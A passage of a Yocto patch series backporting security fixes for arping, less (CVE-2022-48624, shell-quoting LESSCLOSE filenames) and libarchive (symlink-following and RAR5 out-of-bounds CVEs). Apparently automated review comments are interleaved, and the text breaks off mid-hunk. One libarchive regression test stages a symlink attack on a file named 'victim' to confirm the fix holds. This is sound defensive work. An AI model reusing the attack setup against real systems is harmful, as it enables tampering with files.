+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+ enum {
+ POLLFD_SIGNAL = 0,
+ POLLFD_TIMER,
++ POLLFD_TIMEOUT,
+ POLLFD_SOCKET,
+ POLLFD_COUNT
+ };
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+ .it_value.tv_sec = ctl->interval,
+ .it_value.tv_nsec = 0
+ };
++ int timeoutfd;
++ struct itimerspec timeoutfd_vals = {
++ .it_interval.tv_sec = ctl->timeout,
++ .it_interval.tv_nsec = 0,
++ .it_value.tv_sec = ctl->timeout,
++ .it_value.tv_nsec = 0
++ };
+ uint64_t exp, total_expires = 1;
+
+ unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_SIGNAL].fd = sfd;
+ pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+
+- /* timerfd */
++ /* interval timerfd */
+ tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+ if (tfd == -1) {
+ error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_TIMER].fd = tfd;
+ pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+
++ /* timeout timerfd */
++ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++ if (tfd == -1) {
++ error(0, errno, "timerfd_create failed");
++ return 1;
++ }
++ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++ error(0, errno, "timerfd_settime failed");
++ return 1;
++ }
++ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+ /* socket */
+ pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+ pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+ exit_loop = 1;
+ continue;
+ }
+ send_pack(ctl);
+ break;
++ case POLLFD_TIMEOUT:
++ exit_loop = 1;
++ break;
+ case POLLFD_SOCKET:
+ if ((s =
+ recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+--
+2.18.4
+
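Review bot: The error check after the second `timerfd_create()` tests the wrong descriptor: `timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);` is followed by `if (tfd == -1)`. A failed creation is therefore only caught one call later by `timerfd_settime()`, with a misleading "timerfd_settime failed" message. The check should read `if (timeoutfd == -1) {`. The visible hunks also add no `close(timeoutfd);` to match the `close(tfd);` cleanup that the other arping patches show near the end of `event_loop`, so the new descriptor looks leaked, though the end of the function is outside these hunks. As this is a backport, it is worth checking whether upstream corrected either point later and carrying that fix too.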
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
DEPENDS = "gnutls"
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
file://0001-iputils-Initialize-libgcrypt.patch \
+ file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
+ file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
+ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
+ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
+ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
+ file://0001-arping-make-update-neighbours-work-again.patch \
"
SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
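Review bot: The patch `0001-arping-make-update-neighbours-work-again.patch` is listed last, after `0004`, and that order is required even though its `0001-` prefix suggests otherwise. It removes the `!ctl.unsolicited &&` condition that `0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch` introduces, so it cannot apply before it. A short comment in `SRC_URI`, such as `# must follow 0004: partially reverts it`, or renaming the file to `0006-...`, would prevent someone from re-sorting the list alphabetically. Adding `branch=master;protocol=https` to the git URL alongside the pinned `SRCREV` looks fine.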
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ filename.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+ {
+ #if HAVE_POPEN
+ char *lessclose;
++ char *qfilename;
++ char *qaltfilename;
+ FILE *fd;
+ char *cmd;
+ int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+ error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+ return;
+ }
+- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++ qfilename = shell_quote(filename);
++ qaltfilename = shell_quote(altfilename);
++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+ cmd = (char *) ecalloc(len, sizeof(char));
+- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++ free(qaltfilename);
++ free(qfilename);
+ fd = shellcmd(cmd);
+ free(cmd);
+ if (fd != NULL)
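Review bot: The results of `shell_quote()` are passed straight to `strlen()` with no NULL check. The definition of `shell_quote` is outside this hunk. If it can return NULL for a name it cannot quote, `strlen(qfilename)` would dereference a null pointer. A guard before the length computation, such as `if (qfilename == NULL || qaltfilename == NULL) { free(qfilename); free(qaltfilename); return; }`, would skip LESSCLOSE for such names rather than crash. `close_altfile` starts and ends outside the hunk, so whether other cleanup is needed on that path should be checked against the full function.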
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
DEPENDS = "ncurses"
SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+ file://CVE-2022-48624.patch \
"
SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
file://00_arches.patch \
file://destdir.patch \
file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+ Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -364,6 +364,13 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+ else if (acl_set_link_np(name, acl_type, acl) != 0)
+ #else
+ /* FreeBSD older than 8.0 */
+- else if (acl_set_file(name, acl_type, acl) != 0)
++ else if (S_ISLNK(mode)) {
++ /* acl_set_file() follows symbolic links, skip */
++ ret = ARCHIVE_OK;
++ } else if (acl_set_file(name, acl_type, acl) != 0)
+ #endif
+ {
+ if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+ #if ARCHIVE_ACL_FREEBSD_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support RichACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
+ richacl = richacl_alloc(entries);
+ if (richacl == NULL) {
+ archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+ #if ARCHIVE_ACL_LIBACL
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -488,6 +493,18 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support ACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ }
+ #endif /* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ aclent_t *aclent;
+@@ -467,7 +467,6 @@
+ if (entries == 0)
+ return (ARCHIVE_OK);
+
+-
+ switch (ae_requested_type) {
+ case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+ cmd = SETACL;
+@@ -492,6 +491,12 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Skip ACLs on symbolic links */
++ ret = ARCHIVE_OK;
++ goto exit_free;
++ }
++
+ e = 0;
+
+ while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ /* Solaris writes POSIX.1e access and default ACLs together */
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+ #if ARCHIVE_ACL_SUNOS_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
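Review bot: The symlink guards added to the `set_acl()` variants test `S_ISLNK(mode)`, where `mode` is whatever the caller passes in, so by-name calls such as `acl_set_file(name, acl_type, acl)` are only as safe as that value is current. The hunks do not show where `mode` comes from; if it reflects archive metadata rather than the object now on disk at `name`, a symlink at that path would still be followed. I would document the contract on the new parameter, e.g. `/* mode: file type of the on-disk object at 'name'; S_IFLNK makes set_acl() skip by-name ACL calls that follow links */`. In the sunos variant the check needs `goto exit_free`, which suggests it sits after an allocation; placing it before the `switch (ae_requested_type)` would avoid allocating only to free. The function bodies start and end outside the quoted hunks.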
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+
+ /* If we weren't given an fd, open it ourselves. */
+ if (myfd < 0) {
+- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++ O_CLOEXEC | O_NOFOLLOW);
+ __archive_ensure_cloexec_flag(myfd);
+ }
+ if (myfd < 0)
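Review bot: `O_NOFOLLOW` on the added `open()` only refuses a symlink in the final component of `name`; symlinked parent directories are still resolved, so this flag alone does not pin the path. That limit deserves a comment next to the flag, e.g. `/* O_NOFOLLOW covers the last component only; parent directories must already have been vetted */`, and the assumption behind it should be confirmed since it is not visible here. With the flag set, a symlink at `name` makes `open()` fail and control reaches `if (myfd < 0)`; what that branch returns is outside the hunk, so it is worth checking that a skipped symlink is reported as intended rather than as a hard failure.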
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
new file mode 100644
index 0000000000..0dfcd1ac5c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+ libarchive/test/test_write_disk.c \
+ libarchive/test/test_write_disk_appledouble.c \
+ libarchive/test/test_write_disk_failures.c \
++ libarchive/test/test_write_disk_fixup.c \
+ libarchive/test/test_write_disk_hardlink.c \
+ libarchive/test/test_write_disk_hfs_compression.c \
+ libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+ {
+ struct archive_write_disk *a = (struct archive_write_disk *)_a;
+ struct fixup_entry *next, *p;
++ struct stat st;
+ int fd, ret;
+
+ archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+ (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+ fd = open(p->name,
+ O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++ if (fd == -1) {
++ /* If we cannot lstat, skip entry */
++ if (lstat(p->name, &st) != 0)
++ goto skip_fixup_entry;
++ /*
++ * If we deal with a symbolic link, mark
++ * it in the fixup mode to ensure no
++ * modifications are made to its target.
++ */
++ if (S_ISLNK(st.st_mode)) {
++ p->mode &= ~S_IFMT;
++ p->mode |= S_IFLNK;
++ }
++ }
+ }
+ if (p->fixup & TODO_TIMES) {
+ set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+ fchmod(fd, p->mode);
+ else
+ #endif
+- chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++ lchmod(p->name, p->mode);
++#else
++ if (!S_ISLNK(p->mode))
++ chmod(p->name, p->mode);
++#endif
+ }
+ if (p->fixup & TODO_ACLS)
+ archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+ if (p->fixup & TODO_MAC_METADATA)
+ set_mac_metadata(a, p->name, p->mac_metadata,
+ p->mac_metadata_size);
++skip_fixup_entry:
+ next = p->next;
+ archive_acl_clear(&p->acl);
+ free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+ fe->next = a->fixup_list;
+ a->fixup_list = fe;
+ fe->fixup = 0;
++ fe->mode = 0;
+ fe->name = strdup(pathname);
+ return (fe);
+ }
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+ test_write_disk.c
+ test_write_disk_appledouble.c
+ test_write_disk_failures.c
++ test_write_disk_fixup.c
+ test_write_disk_hardlink.c
+ test_write_disk_hfs_compression.c
+ test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ * notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ * notice, this list of conditions and the following disclaimer in the
++ * documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++ struct archive *ad;
++ struct archive_entry *ae;
++ int r;
++
++ if (!canSymlink()) {
++ skipping("Symlinks not supported");
++ return;
++ }
++
++ /* Write entries to disk. */
++ assert((ad = archive_write_disk_new()) != NULL);
++
++ /*
++ * Create a file
++ */
++ assertMakeFile("victim", 0600, "a");
++
++ /*
++ * Create a directory and a symlink with the same name
++ */
++
++ /* Directory: dir */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFDIR | 0606);
++ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ /* Symbolic Link: dir -> foo */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFLNK | 0777);
++ archive_entry_set_size(ae, 0);
++ archive_entry_copy_symlink(ae, "victim");
++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++ if (r >= ARCHIVE_WARN)
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++ /* Test the entries on disk. */
++ assertIsSymlink("dir", "victim", 0);
++ assertFileMode("victim", 0600);
++}
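Review bot: In the fixup loop the new `lstat(p->name, &st)` runs only after `open()` has failed, and the later `chmod(p->name, p->mode)` in the `#else` branch is again by name, so the symlink decision is made at one moment and used at another. `open()` with `O_WRONLY` fails for every directory, so directories always take this lstat-then-chmod route on builds without `HAVE_LCHMOD`. If the path can be replaced between the two calls, `chmod()` would act on whatever the new link points at. I would record that next to the branch, `/* by-name chmod(): relies on the lstat() above still being current */`, and consider comparing the on-disk file type with the type recorded for the fixup entry before any by-name change. The enclosing function starts and ends outside the quoted hunks.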
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+ libarchive/test/test_read_format_rar5.c | 16 +++
+ ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
+ 4 files changed, 89 insertions(+), 46 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+ return ret;
+ }
+
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#1)");
++ return ARCHIVE_FATAL;
++ }
++
+ uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+ bits |= p[rar->bits.in_addr + 1] << 16;
+ bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+ return ARCHIVE_OK;
+ }
+
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#2)");
++ return ARCHIVE_FATAL;
++ }
++
+ int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+ bits |= (int) p[rar->bits.in_addr + 1] << 8;
+ bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+ }
+
+ /* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+- int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, int n, int* value)
+ {
+ uint16_t v;
+ int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+ return ARCHIVE_FATAL;
+ }
+
+- ret = read_bits_16(rar, p, &v);
++ ret = read_bits_16(a, rar, p, &v);
+ if(ret != ARCHIVE_OK)
+ return ret;
+
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+ static int decode_number(struct archive_read* a, struct decode_table* table,
+ const uint8_t* p, uint16_t* num)
+ {
+- int i, bits, dist;
++ int i, bits, dist, ret;
+ uint16_t bitfield;
+ uint32_t pos;
+ struct rar5* rar = get_context(a);
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++ return ret;
+ }
+
+ bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+ for(i = 0; i < HUFF_TABLE_SIZE;) {
